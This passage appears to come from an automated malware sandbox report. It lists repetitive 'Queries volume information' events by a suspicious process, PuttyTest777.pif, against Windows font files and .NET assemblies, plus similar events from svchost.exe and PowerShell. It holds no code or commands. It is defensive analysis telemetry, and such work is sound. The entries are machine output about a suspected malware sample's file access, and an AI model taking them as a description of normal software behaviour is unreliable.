Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
